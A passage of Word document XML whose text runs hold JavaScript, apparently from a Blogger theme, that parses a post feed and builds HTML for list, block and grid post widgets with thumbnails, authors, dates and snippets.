    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            }else{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              $nav.find('.mlsa-left').addClass('disable');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            //update the options</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            if(clev &lt; (Number(lev) - 1)){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              $tn.removeClass('disable');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            }else{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              $tn.addClass('disable');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            //update values</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            $nav.attr('data-clevel',clev + 1);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            $nav.attr('data-start',ustart);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            //process markup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            if(e.feed.entry){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                              var c ='&lt;div class="melesa-loading"&gt;&lt;div class="melesa-table"&gt;&lt;div class="melesa-cell"&gt;&lt;div class="lds-ripple"&gt;&lt;div&gt;&lt;/div&gt;&lt;div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;h3&gt;Loading..&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              for(var i=0;i &lt; e.feed.entry.length;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                //grab details</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                var p = e.feed.entry[i];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                var title = p.title.$t;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                if(p.media$thumbnail){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  var pi = p.media$thumbnail.url;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  //check for the location for thumbnail</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  if(pi.indexOf('/s72-c') !== -1){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    pi = pi.replace('/s72-c','/s1600');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  if(pi.indexOf('img.youtube.com') !== -1){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    pi = pi.replace('/default.jpg','/maxresdefault.jpg');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                }else{</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  var pi = 'https://3.bp.blogspot.com/-UKWIRzqbrE0/W2FUQVPeutI/AAAAAAAAACU/5JRAWbOBx9491ElSDj3krdSsZIfI7fjGwCLcBGAs/s1600/nf.jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                }//pi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                for(var xc=0;xc&lt;p.link.length;xc++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  if(p.link[xc].rel == 'alternate'){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    var pu = p.link[xc].href;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  if((p.link[xc].rel == 'replies') &amp;&amp; (p.link[xc].type == 'text/html') ){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    var cmt = p.link[xc].title;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                }//pu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                var pa = p.author[0].name.$t;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                var pau = p.author[0].uri.$t;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                var time = p.published.$t;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                time = time.split('T');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                var mnt = ["Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sept", "Oct", "Nov", "Dec"];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                time = time[0].split('-');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                time = mnt[Number(time[1]) - 1] + ' ' +  time[2] + ', ' + time[0];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                var snipt =  snip(p.content.$t,25);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                switch(typ){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  case "list-widget":</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    var ct = i;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    if(ct &lt; 1){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      c = c + '&lt;div class="col-sm-12 col-xl-6 first"&gt;&lt;div class="pwrap"&gt;&lt;div class="img-thumb"&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;&lt;img alt="'+title+'" src="'+ pi +'"&gt;&lt;/a&gt;&lt;div class="tags"&gt;&lt;a href="'+ lu +'" title="See all post having tag '+ lbl +'"&gt;'+ lbl +'&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/imgthumb--&gt;&lt;div class="p-title"&gt;&lt;h3&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;!--TITLE--&gt;&lt;div class="pmeta"&gt;&lt;span class="p-author"&gt;&lt;a href="'+pau+'" title="'+ pa +'"&gt;'+ pa +'&lt;/a&gt;&lt;/span&gt; - &lt;span class="p-time"&gt;'+ time +'&lt;/span&gt;&lt;/div&gt;&lt;!--/pmeta--&gt;&lt;div class="p-desc"&gt;'+ snipt +'...&lt;br/&gt;&lt;a class="mlsa-readmore" href="'+pu+'" title="'+ title +'"&gt;Read More&lt;/a&gt;&lt;/div&gt;&lt;!--pdesc--&gt;&lt;/div&gt;&lt;!--/pwrap--&gt;&lt;/div&gt;&lt;!--/colsm6--&gt;&lt;div class="col-sm-12 col-xl-6 second"&gt;&lt;div class="row in"&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    }else{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      c = c + '&lt;div class="col-sm-12"&gt;&lt;div class="pwrap"&gt;&lt;div class="img-thumb"&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;&lt;div class="ithumb" style="background:url('+ pi +')"&gt;&lt;/div&gt;&lt;/a&gt;&lt;/div&gt;&lt;!--/imgthumb--&gt;&lt;div class="right-wrap"&gt;&lt;div class="p-title"&gt;&lt;h3&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;!--TITLE--&gt;&lt;div class="pmeta"&gt;&lt;span class="p-author"&gt;&lt;a href="'+pau+'" title="'+ pa +'"&gt;'+ pa +'&lt;/a&gt;&lt;/span&gt; - &lt;span class="p-time"&gt;'+ time +'&lt;/span&gt;&lt;/div&gt;&lt;!--/pmeta--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/pwrap--&gt;&lt;/div&gt;&lt;!--/sm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    //[END LIST WIDGET]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  case "block-widget":</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                    var ct = i;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    switch(ct){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      case 0:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        c = c + '&lt;div class="col-sm-12 first"&gt;&lt;div class="row"&gt;&lt;div class="col-sm-12"&gt;&lt;div class="pwrap"&gt;&lt;div class="img-thumb"&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;&lt;img alt="'+title+'" src="'+ pi +'"&gt;&lt;/a&gt;&lt;div class="tags"&gt;&lt;a href="'+ lu +'" title="See all post having tag '+ lbl +'"&gt;'+ lbl +'&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/imgthumb--&gt;&lt;div class="p-title"&gt;&lt;h3&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;!--TITLE--&gt;&lt;div class="pmeta"&gt;&lt;span class="p-author"&gt;&lt;a href="'+pau+'" title="'+ pa +'"&gt;'+ pa +'&lt;/a&gt;&lt;/span&gt; - &lt;span class="p-time"&gt;'+ time +'&lt;/span&gt;&lt;/div&gt;&lt;!--/pmeta--&gt;&lt;div class="p-desc"&gt;'+ snipt +'...&lt;br/&gt;&lt;a class="mlsa-readmore" href="'+pu+'" title="'+ title +'"&gt;Read More&lt;/a&gt;&lt;/div&gt;&lt;!--pdesc--&gt;&lt;/div&gt;&lt;!--/pwrap--&gt;&lt;/div&gt;&lt;!--/colsm12--&gt;&lt;/div&gt;&lt;!--/row--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        if(e.feed.entry.length == 1){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          c = c + '&lt;/div&gt;&lt;!--/colsm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      case 1:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        c= c + '&lt;div class="row"&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        c= c + '&lt;div class="col-sm-12 col-xl-6 second"&gt;&lt;div class="pwrap"&gt;&lt;div class="img-thumb"&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;&lt;div class="ithumb" style="background:url('+ pi +')"&gt;&lt;/div&gt;&lt;/a&gt;&lt;/div&gt;&lt;!--/imgthumb--&gt;&lt;div class="right-wrap"&gt;&lt;div class="p-title"&gt;&lt;h3&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;!--TITLE--&gt;&lt;div class="pmeta"&gt;&lt;span class="p-time"&gt;'+ time +'&lt;/span&gt;&lt;/div&gt;&lt;!--/pmeta--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/pwrap--&gt;&lt;/div&gt;&lt;!--/sm6--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        if(e.feed.entry.length == 2){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          c = c+ '&lt;/div&gt;&lt;!--/div--&gt;&lt;/div&gt;&lt;!--/colsm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      case 2:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        c = c + '&lt;div class="col-sm-12 col-xl-6 second"&gt;&lt;div class="pwrap"&gt;&lt;div class="img-thumb"&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;&lt;div class="ithumb" style="background:url('+ pi +')"&gt;&lt;/div&gt;&lt;/a&gt;&lt;/div&gt;&lt;!--/imgthumb--&gt;&lt;div class="right-wrap"&gt;&lt;div class="p-title"&gt;&lt;h3&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;!--TITLE--&gt;&lt;div class="pmeta"&gt;&lt;span class="p-time"&gt;'+ time +'&lt;/span&gt;&lt;/div&gt;&lt;!--/pmeta--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/pwrap--&gt;&lt;/div&gt;&lt;!--/sm12--&gt;&lt;/div&gt;&lt;!--/div--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                        if(e.feed.entry.length == 3){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          c = c+ '&lt;/div&gt;&lt;!--/colsm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      case 3:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        c= c + '&lt;div class="row"&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        c= c + '&lt;div class="col-sm-12 col-xl-6 second"&gt;&lt;div class="pwrap"&gt;&lt;div class="img-thumb"&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;&lt;div class="ithumb" style="background:url('+ pi +')"&gt;&lt;/div&gt;&lt;/a&gt;&lt;/div&gt;&lt;!--/imgthumb--&gt;&lt;div class="right-wrap"&gt;&lt;div class="p-title"&gt;&lt;h3&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;!--TITLE--&gt;&lt;div class="pmeta"&gt;&lt;span class="p-time"&gt;'+ time +'&lt;/span&gt;&lt;/div&gt;&lt;!--/pmeta--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/pwrap--&gt;&lt;/div&gt;&lt;!--/sm6--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        if(e.feed.entry.length == 4){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          c = c+ '&lt;/div&gt;&lt;!--/div--&gt;&lt;/div&gt;&lt;!--/colsm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      case 4:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        c = c + '&lt;div class="col-sm-12 col-xl-6 second"&gt;&lt;div class="pwrap"&gt;&lt;div class="img-thumb"&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;&lt;img class="ithumb" style="background:url('+ pi +')"&gt;&lt;/div&gt;&lt;/a&gt;&lt;/div&gt;&lt;!--/imgthumb--&gt;&lt;div class="right-wrap"&gt;&lt;div class="p-title"&gt;&lt;h3&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;!--TITLE--&gt;&lt;div class="pmeta"&gt;&lt;span class="p-time"&gt;'+ time +'&lt;/span&gt;&lt;/div&gt;&lt;!--/pmeta--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/pwrap--&gt;&lt;/div&gt;&lt;!--/sm12--&gt;&lt;/div&gt;&lt;!--/div--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        c = c+ '&lt;/div&gt;&lt;!--/colsm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    }//switch ct</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    //[END BLOCK WIDGET]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  case "grid-widget":</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    var ct = i;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    switch(ct){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      case 0:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                        c = c + '&lt;div class="col-sm-12 first"&gt;&lt;div class="row"&gt;&lt;div class="col-sm-12 col-xl-6"&gt;&lt;div class="pwrap"&gt;&lt;div class="img-thumb"&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;&lt;div class="kit-img" alt="'+title+'" style="background:url('+ pi +')"&gt;&lt;/div&gt;&lt;/a&gt;&lt;div class="tags"&gt;&lt;a href="'+ lu +'" title="See all post having tag '+ lbl +'"&gt;'+ lbl +'&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/imgthumb--&gt;&lt;div class="p-title"&gt;&lt;h3&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;!--TITLE--&gt;&lt;div class="pmeta"&gt;&lt;span class="p-author"&gt;&lt;a href="'+pau+'" title="'+ pa +'"&gt;'+ pa +'&lt;/a&gt;&lt;/span&gt; - &lt;span class="p-time"&gt;'+ time +'&lt;/span&gt;&lt;/div&gt;&lt;!--/pmeta--&gt;&lt;div class="p-desc"&gt;'+ snipt +'...&lt;br/&gt;&lt;a class="mlsa-readmore" href="'+pu+'" title="'+ title +'"&gt;Read More&lt;/a&gt;&lt;/div&gt;&lt;!--pdesc--&gt;&lt;/div&gt;&lt;!--/pwrap--&gt;&lt;/div&gt;&lt;!--/colsm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        if(e.feed.entry.length == 1){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          c = c + '&lt;/div&gt;&lt;!--/row--&gt;&lt;/div&gt;&lt;!--/colsm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      case 1:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
